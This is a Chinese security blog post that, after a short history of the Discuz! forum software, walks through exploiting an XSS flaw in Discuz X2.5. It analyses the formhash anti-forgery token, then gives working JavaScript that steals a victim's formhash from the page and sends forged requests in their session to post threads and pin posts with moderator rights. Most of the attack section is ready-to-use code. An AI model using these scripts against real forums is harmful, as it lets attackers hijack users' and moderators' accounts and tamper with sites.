Crossday Discuz! Board(简称 Discuz!)是北京康盛新创科技有限责任公司推出的一套通用的社区论坛软件系统。自2001年6月面世以来,Discuz!已拥有11年以上的应用历史和200多万网站用户案例,是全球成熟度最高、覆盖率最大的论坛软件系统之一。目前最新版本Discuz! X2.5正式版于2012年4月7日发布,首次引入应用中心的开发模式。2010年8月23日,康盛创想与腾讯达成收购协议,成为腾讯的全资子公司。
作为国内最大的社区软件及服务提供商,Comsenz旗下的 Discuz! 开发组具有丰富的 web 应用程序设计经验,尤其在论坛产品及相关领域,经过长期创新性开发,掌握了一整套从算法,数据结构到产品安全性方面的领先技术。使得 Discuz! 无论在稳定性,负载能力,安全保障等方面都居于国内外同类产品领先地位
Discuz! 论坛软件系统项目起始于 2001 年底,初创时名称为 CDB,是一名大二学生戴志康借鉴国外同期技术,以技术研究为目的,利用业余时间完成的一个免费软件。因较快的升级与完善速度,CDB 于 2002 年初开始拥有了最早的一批用户。作者在技术学习和研究的同时,积极采纳来自最终用户的使用反馈,在用户的理解与支持下,CDB 作为一个相对起步较晚的论坛软件项目,取得了相对一个初创软件项目来说较快的进展,并实现了初期的网络协作开发模式。
本文重点在于discuz xss的利用, exploit是前几天疯子发的(http://www.wooyun.org/bugs/wooyun-2010-015312) 积分转账的xss 漏洞 ,貌似利用有点鸡肋(=.=).
Discuz formhash 简单分析
熟悉discuz的都知道,formhash是一种类似验证码的东西,用来防止从我们网站外部提交数据,但不需要我们手动输入,它在页面打开时就已经生成了,存在一需要提交数据用到的地方的隐藏input里(比如登录、发布文章)。
例如发帖页面页面模板
<inputtype="hidden" name="formhash" id="formhash" value="{FORMHASH}" />
其相应服务端验证代码
if (submitcheck('formhash')) {
我们来看这货的生成算法
substr(md5(substr($_G['timestamp'], 0, -7).$_G['username'].$_G['uid'].$_G['authkey'].$hashadd.$specialadd), 8, 8);
时间戳前3位,大概是 100多天的样子,也就是说这货对于同一人来说 100 天内是不变的.
获取 formhash
当我们进行csrf操作时,首先得获取目标的 formhash,例如用户这里的提醒xss
截取出来即可
var hash;
function getHash(){
for(var i=0; i<document.links.length; i++)
{
if(document.links[i].href.indexOf("action=logout&formhash=")>0)
{
hash=document.links[i].href;
hash=hash.substr(hash.length-8,hash.length);
break;
} } }
Csrf代码编写
得到了formhash就简单了 只要抓取各种 post包即可做各种猥琐事情了 ,这里笔者用了个
兼容的ajax库(截取自jquery中的 ajax代码)
x = window.x || {
request: function() {
if (window.XMLHttpRequest) {
var ajax = new XMLHttpRequest()
} else if (window.ActiveXObject) {
try {
var ajax = new ActiveXObject("Msxml2.XMLHTTP")
} catch(e) {
try {
var ajax = new ActiveXObject("Microsoft.XMLHTTP")
} catch(e) {}
}
}
return ajax
},
handle: function(ajax, callback) {
ajax.onreadystatechange = function() {
if (ajax.readyState == 4) {
if (ajax.status == 200) {
callback(ajax.responseText)
}
}
}
},
display:function(o){
if(typeof(o)=='object'){
var str='';
for(a in o){
str+=a+'='+o[a]+'&';
}
str=str.substr(0,str.length-1);
return str;
}else{
return o;
}
},
get: function(url, callback) {
ajax = x.request();
ajax.open('get', url, true);
ajax.send(null);
x.handle(ajax, callback)
},
post: function(url, content, callback) {
ajax = x.request();
ajax.open('post', url, true);
ajax.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
content=x.display(content);
ajax.send(content);
x.handle(ajax, callback)
},
}
发帖操作
x.post("forum.php?mod=post&action=newthread&fid=2&extra=&topicsubmit=yes","formhash="+hash+"&posttime=1353989838&wysiwyg=1&subject=title&message=aaaaaaaaaaaaaaaa%0D%0A&replycredit_extcredits=0&replycredit_times=1&replycredit_membertimes=1&replycredit_random=100&readperm=&price=&tags=test&rushreplyfrom=&rushreplyto=&rewardfloor=&stopfloor=&creditlimit=&save=&adddynamic=true&usesig=1&allownoticeauthor=1");
置顶帖子
x.post("forum.php?mod=topicadmin&action=moderate&optgroup=1&modsubmit=yes&infloat=yes&inajax=1","frommodcp=&formhash="+hash+"&fid=2&redirect=&listextra=page%3D1&handlekey=mods&moderate[]=12&operations[]=stick&sticklevel=3&expirationstick=&digestlevel=0&expirationdigest=&highlight_color=0&highlight_style[1]=0&highlight_style[2]=0&highlight_style[3]=0&expirationhighlight=&reason=");
视频地址:http://www.2cto.com/soft/201212/35794. html
查看更多关于Discuz xss利用演示 - 网站安全 - 自学php的详细内容...